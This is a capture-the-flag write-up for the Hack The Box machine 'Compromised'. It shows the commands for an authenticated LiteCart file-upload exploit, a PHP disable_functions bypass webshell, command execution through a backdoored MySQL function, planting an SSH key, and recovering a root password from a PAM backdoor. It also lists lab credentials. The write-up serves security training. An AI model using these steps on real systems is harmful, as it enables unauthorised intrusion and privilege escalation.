Posts Compromised Writeup [HTB]
Post
Cancel

Compromised Writeup [HTB]

Compromised is a linux machine rated as difficult from Hack The Box, it consists on enumerating to find credentials for admin access, then as lots of php functions are disabled, a php bypass exploit can be used to obtain a webshell. Then, looking for backdoors mysql can be used to obtain ssh access and then obtaining sysadmin credentials. Finally a pam backdoor is found and by reversing it, root credentials are retrieved.

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
  nmap -sC -sV compromised.htb
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6e:da:5c:8e:8e:fb:8e:75:27:4a:b9:2a:59:cd:4b:cb (RSA)
|   256 d5:c5:b3:0d:c8:b6:69:e4:fb:13:a3:81:4a:15:16:d2 (ECDSA)
|_  256 35:6a:ee:af:dc:f8:5e:67:0d:bb:f3:ab:18:64:47:90 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was http://compromised.htb/shop/en/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browsing to port 80 we find the following page :

Web

Running gobuster to enumerate web directories we find a backup dir containing a copy of the page source :

1
2
3
4
gobuster dir -u http://compromised.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/shop (Status: 301)
/backup (Status: 301)
/server-status (Status: 403)

Enumerating the backup of the site, I decided to grep inside admin directory to see it there were any passwords :

1
2
noxious@kali:~/Desktop/Vms/HTB/Compromised/shop/admin$ grep -ir "passwd" --color=always
login.php:    //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);

Then this file stood out, it wasn’t inside the backup of the site but accesing it through the web revealed the admin credentials : Web

Exploitation

After being logged in as admin it was discovered that the site was running LiteCart 2.1.2 for which an arbitraty file upload exploit was available :

https://www.exploit-db.com/exploits/45267

Running the exploit :

1
2
python litecart.py -t http://compromised.htb/shop/admin/ -u 'admin' -p 'theNextGenSt0r3!~'
Shell => http://compromised.htb/shop/admin/../vqmod/xml/GVYL1.php?c=id

But when I tried to use that webshell I found out that it didn’t work, so I modified the exploit code to run a phpinfo(), discovering that there were several php functions disabled.

Web

Most of these functions are used to obtain a webshell, therefore, knowing the php version I searched for an exploit that bypassed disabled functions :

https://packetstormsecurity.com/files/154728/PHP-7.3-disable_functions-Bypass.html

Then we needed to modify the code to get a webshell :

1
pwn($_GET[‘c’]);

Next, we started burpsuite to upload the exploit in the following url : http://compromised.htb/shop/admin/?app=vqmods&doc=vqmods

Modifying content-type to xml was enough to bypass the filter and upload the file :

Web

Finally, we can use webwrap to obtain an interactive webshell :

1
2
3
rlwrap python3 webwrap.py http://compromised.htb/shop/vqmod/xml/sh.php?c=WRAP
www-data@compromised:/var/www/html/shop/vqmod/xml$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now we need to enumerate the machine in order to find some information that can lead us to obtain user access.

First by reading /etc/passwd I noticed that the mysql user had /bin/bash and following the machine’s name this might be a hint that this service has some kind of backdoor :

1
2
www-data@compromised:/var/www/html/shop/vqmod/xml$ cat /etc/passwd
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash

Afterwards, a config file containing database credentials was discovered :

1
2
3
4
5
6
7
8
9
10
www-data@compromised:/var/www/html/shop/includes$ cat config.inc.php
// Database                                                                                                                
  define('DB_TYPE', 'mysql');                                                                                              
  define('DB_SERVER', 'localhost');                                                                                        
  define('DB_USERNAME', 'root');                                                                                           
  define('DB_PASSWORD', 'changethis');                                                                                     
  define('DB_DATABASE', 'ecom');                                                                                           
  define('DB_TABLE_PREFIX', 'lc_');                                                                                        
  define('DB_CONNECTION_CHARSET', 'utf8');                                                                                 
  define('DB_PERSISTENT_CONNECTIONS', 'false');

Investigating about mysql backdoor and exploits I came across this [article] (https://recipeforroot.com/mysql-to-system-root/) which pointed me where to look.

1
2
3
4
www-data@compromised:/var/www/html/shop/includes$ mysql -u root --password=changethis -e "use mysql; select * from func"
mysql: [Warning] Using a password on the command line interface can be insecure.
name    ret     dl      type
exec_cmd        0       libmysql.so     function

Then we could use this exec_cmd function to execute commands as mysql user :

1
2
3
4
mysql -u root --password=changethis -e "select exec_cmd('id')"
mysql: [Warning] Using a password on the command line interface can be insecure.
exec_cmd('id')
uid=111(mysql) gid=113(mysql) groups=113(mysql)

Next, as ssh service was open I decided to upload my public key to authorized keys

1
mysql -u root --password=changethis -e "select exec_cmd('echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFuyPr4RFVPtUVBstN9/BoYQemup/I2VkSHV2lw8ul+d noxious@kali > ~/.ssh/authorized_keys')"

We could just ssh as mysql user :

1
2
3
ssh mysql@compromised.htb
mysql@compromised:~$ id
uid=111(mysql) gid=113(mysql) groups=113(mysql)

Enumerating files , strace-log.dat caught my attention, grepping for passwords there was an interesting finding from mysql :

1
2
mysql@compromised:~$ cat strace-log.dat | grep password
22227 03:11:09 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=3*NLJE32I$Fe"], 0x55bc62467900 /* 21 vars */)

Then, I tried this password to see if I was able to switch user to sysadmin, being successful

1
2
3
mysql@compromised:~$ su sysadmin
sysadmin@compromised:/var/lib/mysql$ id
uid=1000(sysadmin) gid=1000(sysadmin) groups=1000(sysadmin)

Privilege Escalation

After some time enumerating without finding any useful thing, I decided to follow the machine’s theme and try to look for backdoors , so looking for recently modified things I came across the following output

1
2
3
4
5
6
7
8
9
sysadmin@compromised:/lib$ find . -mtime -24
.
./x86_64-linux-gnu/security
./x86_64-linux-gnu/security/.pam_unix.so
./x86_64-linux-gnu/security/pam_unix.so
./systemd/system
./udev
./udev/rules.d
./ifupdown

Looking for a pam backdoor , I found one in github that created the same archive :

https://github.com/zephrax/linux-pam-backdoor

So I decided to transfer this file to my machine using scp:

1
scp sysadmin@compromised.htb:/lib/x86_64-linux-gnu/security/pam_unix.so Desktop/pam_unix.so

Once I had this file in my machine, I opened it with ghidra in order to see if I could find the password used

Decompiling the functions, there were two hex strings inside pam_sm_authenticate belonging to variable backdoor :

Web

Switching this two strings to little endian and appending them we got the following hex string :

1
7a6c6b657e5533456e7638326d322d

Decoding it we obtain the root password :

1
2
echo "7a6c6b657e5533456e7638326d322d" | xxd -r -p
zlke~U3Env82m2-

Finally, we can just access root account :

1
2
3
4
5
6
sysadmin@compromised:/lib$ su root
Password:
root@compromised:/lib# id
uid=0(root) gid=0(root) groups=0(root)
root@compromised:/lib# whoami
root
This post is licensed under CC BY 4.0 by the author.